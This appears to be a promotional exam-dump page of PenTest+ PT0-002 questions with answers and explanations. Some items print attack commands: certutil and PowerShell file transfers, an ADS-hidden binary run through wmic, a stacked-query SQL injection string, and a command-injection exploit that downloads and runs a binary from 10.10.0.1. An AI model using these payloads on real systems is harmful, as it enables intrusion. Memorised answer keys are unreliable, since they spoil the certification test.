[2023 latest] Try the latest high-pass-rate PT0-002 test notes and the PT0-002 high-pass-rate exam guide [Q131-Q155]



The PT0-002 real-question answer PDF covers 100% of the real exam questions

Question # 131
A penetration tester captured the following traffic during a web-application test:

Which of the following methods should the tester use to visualize the authorization information being transmitted?

  • A. Decrypt the authorization header using bcrypt.
  • B. Decode the authorization header using Base64.
  • C. Decrypt the authorization header using AES.
  • D. Decode the authorization header using UTF-8.

Correct answer: B
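The Authorization header in HTTP Basic authentication carries `username:password` Base64-encoded, which is reversible without any key; bcrypt and AES (options A and C) do not apply because nothing was encrypted, and UTF-8 (option D) is a character encoding, not the transformation the header uses. The following is an added example, not code from the original page, that pulls the header out of a captured request and decodes it; it also decodes the header and claims of a Bearer JWT, which use the URL-safe Base64 variant without padding. The request text and the credentials in it are constructed for the example.

```python
import base64
import json

# Constructed sample capture; the credentials are made up for this example.
SAMPLE_REQUEST = (
    "GET /api/account HTTP/1.1\r\n"
    "Host: app.example.test\r\n"
    "Authorization: Basic YWRtaW46UGFzc3cwcmQh\r\n"
    "\r\n"
)


def extract_authorization(raw_request):
    """Return the Authorization header value from a raw HTTP request, or None."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(":")
        if name.strip().lower() == "authorization":
            return value.strip()
    return None


def b64url_decode(segment):
    """Decode URL-safe Base64 that may have had its '=' padding stripped (JWT style)."""
    pad = "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment + pad)


def decode_authorization(header_value):
    """Decode (not decrypt) the credential carried by an Authorization header."""
    scheme, _, credential = header_value.partition(" ")
    scheme = scheme.lower()
    if scheme == "basic":
        # RFC 7617: Base64 of "user-id:password"; the first colon separates them.
        text = base64.b64decode(credential).decode("utf-8", "replace")
        user, _, password = text.partition(":")
        return {"scheme": "Basic", "username": user, "password": password}
    if scheme == "bearer" and credential.count(".") == 2:
        # JWT: header.payload.signature, each segment base64url; signature left alone.
        head, body, _signature = credential.split(".")
        return {
            "scheme": "Bearer",
            "header": json.loads(b64url_decode(head)),
            "claims": json.loads(b64url_decode(body)),
        }
    return {"scheme": scheme, "credential": credential}


if __name__ == "__main__":
    header = extract_authorization(SAMPLE_REQUEST)
    print(header)
    print(decode_authorization(header))
```

Decoding a JWT this way shows its contents but says nothing about whether it is genuine; checking the signature requires the verification key, which a tester normally does not have.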


Question # 132
A penetration tester has prepared the following phishing email for an upcoming penetration test:

Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?

  • A. Familiarity and likeness
  • B. Authority and urgency
  • C. Scarcity and fear
  • D. Social proof and greed

Correct answer: B


Question # 133
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

  • A. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe
  • B. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/ upload.php', 'systeminfo.txt')
  • C. schtasks /query /fo LIST /v | find /I "Next Run Time:"
  • D. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe

Correct answer: A

Explanation:
certutil.exe is present on a default Windows installation and can download a file over HTTP, so it is the natural way to pull the Sysinternals AccessChk binary onto the host; AccessChk is then used to enumerate which services a low-privilege account can reconfigure. Option D uses GNU wget syntax, which cmd.exe on a default Windows installation does not provide, and options B and C do not help with service permissions.
https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/
https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk


Question # 134
A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client's data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester's decision?

  • A. The tester found evidence of prior compromise within the data set.
  • B. The tester reached the end of the assessment time frame.
  • C. The tester completed the assigned part of the assessment workflow.
  • D. The tester had the situational awareness to stop the transfer.

Correct answer: D

Explanation:
Situational awareness is the ability to perceive and understand the environment and events around oneself, and to act accordingly. The penetration tester demonstrated situational awareness by stopping the transfer of PII, which was out of scope and could have violated the ROE or legal and ethical principles. The other options do not describe the decision the tester made.


Question # 135
A penetration tester is conducting an assessment against a group of publicly available web servers and notices a number of TCP resets returning from one of the web servers. Which of the following is MOST likely causing the TCP resets to occur during the assessment?

  • A. The web server is using a WAF.
  • B. The local antivirus on the web server is rejecting the connection.
  • C. The web server is behind a load balancer.
  • D. The web server is redirecting the requests.

Correct answer: A

Explanation:
A Web Application Firewall (WAF) monitors, filters, or blocks traffic to a web application and is commonly deployed to protect web servers from attacks such as SQL injection and cross-site scripting (XSS). When a WAF decides a request is malicious, one common response is to tear down the TCP connection with a reset rather than return an HTTP error, so a tester sending attack-like requests to public web servers sees TCP resets coming back from the one that is protected. A load balancer or a redirect would not generate resets in response to specific requests, and host antivirus does not typically act on inbound HTTP connections, so the WAF is the most likely cause.


Question # 136
A consultant is reviewing the following output after reports of intermittent connectivity issues:
? (192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
? (192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [ethernet]
? (192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [ethernet]
? (192.168.1.34) at 88:de:a9:12:ce:fb on en0 ifscope [ethernet]
? (192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]
? (224.0.0.251) at 01:02:5e:7f:ff:fa on en0 ifscope permanent [ethernet]
? (239.255.255.250) at ff:ff:ff:ff:ff:ff on en0 ifscope permanent [ethernet]
Which of the following is MOST likely to be reported by the consultant?

  • A. An ARP flooding attack is using the broadcast address to perform DDoS.
  • B. A multicast session was initiated using the wrong multicast group.
  • C. A device on the network has an IP address in the wrong subnet.
  • D. A device on the network has poisoned the ARP cache.

Correct answer: D

Explanation:
The gateway (192.168.1.1) resolves to 0a:d1:fa:b1:01:67, and a second host (192.168.1.136) claims the same MAC address. Two unicast IP addresses sharing one hardware address in the cache is the signature of ARP cache poisoning: frames for the gateway go to whichever device last answered, so connectivity is intermittent for as long as the spoofing host keeps winning the cache entry, and it drops traffic outright if it has not been configured to forward what it intercepts. The broadcast (ff:ff:ff:ff:ff:ff) and multicast entries at the bottom are normal and are not evidence of an attack.
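Spotting the duplicate by eye works for eight lines; on a larger segment it is easier to script. The following is an added example, not from the original page, that parses the question's arp -a output (the macOS/BSD format shown above), ignores broadcast and multicast entries, and reports unicast MAC addresses claimed by more than one IP, plus a gateway-specific check. The gateway address 192.168.1.1 is taken from the question; the helper names are the example's own.

```python
import re
from collections import defaultdict

# ARP cache from the question (macOS/BSD `arp -a` format), used as sample input.
ARP_OUTPUT = """\
? (192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
? (192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [ethernet]
? (192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [ethernet]
? (192.168.1.34) at 88:de:a9:12:ce:fb on en0 ifscope [ethernet]
? (192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]
? (224.0.0.251) at 01:02:5e:7f:ff:fa on en0 ifscope permanent [ethernet]
? (239.255.255.250) at ff:ff:ff:ff:ff:ff on en0 ifscope permanent [ethernet]
"""

LINE_RE = re.compile(
    r"\((?P<ip>\d+\.\d+\.\d+\.\d+)\) at (?P<mac>[0-9A-Fa-f:]{17}|\(incomplete\))"
)


def parse_arp(text):
    """Return (ip, mac) pairs; unresolved entries keep the literal '(incomplete)'."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            entries.append((m.group("ip"), m.group("mac").lower()))
    return entries


def is_group_address(mac):
    """Broadcast and multicast MACs have the I/G bit (LSB of the first octet) set."""
    return int(mac.split(":")[0], 16) & 1 == 1


def find_duplicate_macs(entries):
    """Map each unicast MAC claimed by more than one IP to the IPs claiming it."""
    by_mac = defaultdict(list)
    for ip, mac in entries:
        if mac == "(incomplete)" or is_group_address(mac):
            continue  # broadcast/multicast entries legitimately repeat
        by_mac[mac].append(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_impersonators(entries, gateway_ip):
    """IPs other than the gateway that present the gateway's MAC address."""
    gw_mac = dict(entries).get(gateway_ip)
    if gw_mac is None or gw_mac == "(incomplete)":
        return []
    return [ip for ip, mac in entries if mac == gw_mac and ip != gateway_ip]


if __name__ == "__main__":
    entries = parse_arp(ARP_OUTPUT)
    for mac, ips in find_duplicate_macs(entries).items():
        print(f"{mac} claimed by {', '.join(ips)}")
    print("gateway impersonators:", gateway_impersonators(entries, "192.168.1.1"))
```

A shared MAC is not always an attack: a VRRP/HSRP virtual router, a host with secondary addresses, or a NAT device will legitimately answer for several IPs. Confirm that the suspect address (192.168.1.136 here) is not a known infrastructure device before reporting ARP poisoning.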


Question # 137
A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?

  • A. nmap -vv -sUV -p 53, 122-123, 160-161 10.10.1.20/24 -oA udpscan
  • B. nmap -vv -sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan
  • C. nmap -vv -sUV -p 53,123,161-162 10.10.1.20/24 -oA udpscan
  • D. nmap -vv -sUV -p 53, 123-159 10.10.1.20/24 -oA udpscan

Correct answer: B

Explanation:
-sU selects a UDP scan and -sV adds service/version detection (combined here as -sUV). The port list has to cover DNS (53), the NetBIOS name, datagram and session services (137-139), and the SNMP agent and trap ports (161-162). Option C omits NetBIOS and scans NTP (123) instead; options A and D list ranges that do not correspond to the requested services.


Question # 138
When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:

  • A. testing adds to the workload of defensive cyber- and threat-hunting teams.
  • B. testing can make detecting actual APT more challenging.
  • C. business and network operations may be impacted.
  • D. security compliance regulations or laws may be violated.

Correct answer: C


Question # 139
During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:

  • A. SOW.
  • B. SLA.
  • C. NDA
  • D. ROE.

Correct answer: D

Explanation:
https://mainnerve.com/what-are-rules-of-engagement-in-pen-testing/#:~:text=The%20ROE%20includes%20the%


Question # 140
A Chief Information Security Officer wants to evaluate the security of the company's e-commerce application. Which of the following tools should a penetration tester use FIRST to obtain relevant information from the application without triggering alarms?

  • A. DirBuster
  • B. OWASP ZAP
  • C. w3af
  • D. SQLmap

Correct answer: B


Question # 141
A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

  • A. nmap 192.168.1.1-5 -Ss22-25,80
  • B. nmap 192.168.1.1-5 -PS22-25,80
  • C. nmap 192.168.1.1-5 -PA22-25,80
  • D. nmap 192.168.1.1-5 -PU22-25,80

Correct answer: B

Explanation:
PS, PA, PU and PY are host-discovery flags that use TCP SYN/ACK, UDP or SCTP discovery respectively. Since the ports in the options are mostly used by TCP protocols, it is either the PS or the PA flag. But since we need to know whether the ports are live, sending a SYN packet is the better alternative. Hence, I choose PS in this case.


Question # 142
Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:

  • A. may reduce the true positive rate of findings.
  • B. will reveal vulnerabilities in the Modbus protocol.
  • C. may cause unintended failures in control systems.
  • D. will create a denial-of-service condition on the IP networks.

Correct answer: C


Question # 143
After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:

The tester then runs the following command from the previous exploited system, which fails:
Which of the following explains the reason why the command failed?

  • A. The tester input the incorrect IP address.
  • B. The command requires the -port 135 option.
  • C. PowerShell requires administrative privilege.
  • D. An account for RDP does not exist on the server.

Correct answer: D


Question # 144
During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client's cybersecurity tools? (Choose two.)

  • A. Phishing company employees
  • B. Crawling the client's website
  • C. Conducting wardriving near the client facility
  • D. Utilizing DNS lookup tools
  • E. Scraping social media sites
  • F. Using the WHOIS lookup tool

Correct answer: B, E

Explanation:
Technical and billing contact addresses are usually published on the company's own website and on its social media accounts so that customers can reach them, and reading either is passive. A WHOIS lookup returns the domain registrant and an abuse contact, but registrant data is often privacy-protected and rarely includes billing contacts. Phishing employees is an active attack, wardriving targets wireless networks rather than contacts, and DNS lookup tools return records, not people.


Question # 145
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Correct answer:

Explanation:
1. Reflected XSS - Input sanitization (< > ...)
2. SQL injection (stacked queries) - Parameterized queries
3. DOM XSS - Input sanitization (< > ...)
4. Local file inclusion - Sandbox requests
5. Command injection - Sandbox requests
6. SQL injection (UNION-based) - Parameterized queries
7. SQL injection (error-based) - Parameterized queries
8. Remote file inclusion - Sandbox requests
9. Command injection - Input sanitization ($ ...)
10. URL redirect - Prevent external calls


Question # 146
A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

  • A. Alternate data streams
  • B. MP4 steganography
  • C. PsExec
  • D. PowerShell modules

Correct answer: A

Explanation:
Alternate data streams (ADS) are a feature of the NTFS file system that allow additional data to be stored inside a file without changing its apparent size, name, or behaviour. An ADS can hold a hidden payload such as a specially crafted binary for later execution, and streams can be created or read from the command prompt, PowerShell, or Sysinternals tools. For example, the following command writes an ADS named secret.exe into test.txt and then launches it through wmic.exe process call create:
type secret.exe > test.txt:secret.exe & wmic process call create "cmd.exe /c test.txt:secret.exe"
Note that dir /r lists alternate streams, so an ADS hides the binary from casual inspection, not from a defender who looks for it.


Question # 147
A penetration tester successfully performed an exploit on a host and was able to hop from VLAN 100 to VLAN 200. VLAN 200 contains servers that perform financial transactions, and the penetration tester now wants the local interface of the attacker machine to have a static ARP entry in the local cache. The attacker machine has the following:
IP Address: 192.168.1.63
Physical Address: 60-36-dd-a6-c5-33
Which of the following commands would the penetration tester MOST likely use in order to establish a static ARP entry successfully?

  • A. tcpdump -i eth01 arp and arp[6:2] == 2
  • B. ipconfig /all findstr /v 00-00-00 | findstr Physical
  • C. route add 192.168.1.63 mask 255.255.255.255.0 192.168.1.1
  • D. arp -s 192.168.1.63 60-36-DD-A6-C5-33

Correct answer: D

Explanation:
The arp command displays or manipulates the Address Resolution Protocol (ARP) cache, the table that maps IP addresses to physical (MAC) addresses on the local segment. The -s option adds a static entry, which does not expire and is not overwritten by ARP replies received from the network.
The syntax is arp -s <IP address> <physical address>, so arp -s 192.168.1.63 60-36-DD-A6-C5-33 adds a static entry for 192.168.1.63 with the physical address 60-36-DD-A6-C5-33 to the attacker machine's cache. Pinning the mapping means the entry cannot be changed by spoofed ARP replies on the financial VLAN. The hyphenated MAC format and the ipconfig option indicate a Windows host; on Linux, arp -s expects the colon-separated form. The other commands capture ARP traffic, print the interface address, or add a route (with an invalid mask); none of them creates a static ARP entry.


Question # 148
Which of the following documents is agreed upon by all parties associated with the penetration-testing engagement and defines the scope, contacts, costs, duration, and deliverables?

  • A. MSA
  • B. SOW
  • C. NDA
  • D. SLA

Correct answer: B

Explanation:
The document agreed upon by all parties to the penetration-testing engagement that defines the scope, contacts, costs, duration, and deliverables is the SOW (Statement of Work). The SOW is a formal document that describes the objectives, expectations, and responsibilities of the project, and it should be clear, concise, and comprehensive to avoid ambiguity or misunderstanding.


Question # 149
A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments. Which of the following techniques should the tester select to accomplish this task?

  • A. Encryption
  • B. Steganography
  • C. Encode64
  • D. Metadata removal

Correct answer: B


Question # 150
A penetration tester conducts an Nmap scan against a target and receives the following results:

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

  • A. Empire
  • B. ProxyChains
  • C. OWASP ZAP
  • D. Nessus

Correct answer: B


Question # 151
A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?

  • A. Deconflict with the penetration tester.
  • B. Assume the alert is from the penetration test.
  • C. Halt the penetration test.
  • D. Contact law enforcement.

Correct answer: A

Explanation:
Deconflicting with the penetration tester is the right next step when security alarms fire during a test, because it establishes whether the alert was caused by the tester's activity or by a real intrusion. Deconfliction is the process of communicating and coordinating with the other parties in the engagement, such as the security team, network administrators, or the emergency contacts, to avoid confusion or interference. Assuming the alert is the test (B) risks ignoring an actual attacker, and halting the test or calling law enforcement is premature until the source is known.


Question # 152
A penetration tester is looking for vulnerabilities within a company's web application that are in scope. The penetration tester discovers a login page and enters the following string in a field:
1;SELECT Username, Password FROM Users;
Which of the following injection attacks is the penetration tester using?

  • A. Error-based
  • B. Boolean SQL
  • C. Blind SQL
  • D. Stacked queries

Correct answer: D

Explanation:
The tester is using stacked queries: several SQL statements, separated by semicolons, are appended in a single input field. Where the application passes the string to a database call that executes multiple statements in one batch, the second statement runs as well, letting the tester execute arbitrary SQL such as selecting usernames and passwords from the Users table. Error-based, Boolean, and blind injection all work within a single statement and are distinguished by how the result is inferred, not by adding statements.


Question # 153
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

  • A. Analyze the malware to see what it does.
  • B. Remove the malware immediately.
  • C. Stop the assessment and inform the emergency contact.
  • D. Collect the proper evidence and then remove the malware.
  • E. Do a root-cause analysis to find out how the malware got in.

Correct answer: C

Explanation:
Stopping the assessment and informing the emergency contact is the correct next step after discovering that an application under test has already been compromised with malware, because continuing could interfere with an incident investigation or destroy evidence. The emergency contact is the person designated by the client to be notified of critical issues or incidents during the engagement. Analysing, removing, or performing root-cause analysis on the malware is the client's incident response decision, not the tester's.


Question # 154
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"
Which of the following commands should the penetration tester run post-engagement?

  • A. grep -v apache ~/.bash_history > ~/.bash_history
  • B. taskkill /IM "apache" /F
  • C. rm -rf /tmp/apache
  • D. chmod 600 /tmp/apache

Correct answer: C

Explanation:
The injected command (with ${IFS} standing in for spaces) changes to /tmp, downloads a binary named apache from 10.10.0.1, marks it executable, and runs it. Post-engagement cleanup means removing what the test left on the host, so the dropped file /tmp/apache must be deleted (C), and any process it started should be stopped as well. Option A is an attempt to edit the shell history rather than cleanup, and the redirection truncates ~/.bash_history before grep reads it; taskkill is a Windows command; chmod 600 leaves the binary in place.


Question # 155
......

PT0-002 exam questions and answers: https://www.goshiken.com/CompTIA/PT0-002-mondaishu.html

PT0-002 exam information for passing and a free practice test: https://drive.google.com/open?id=1DPaJ7JtaMgcHIQq0772pDt7PLCtzojWy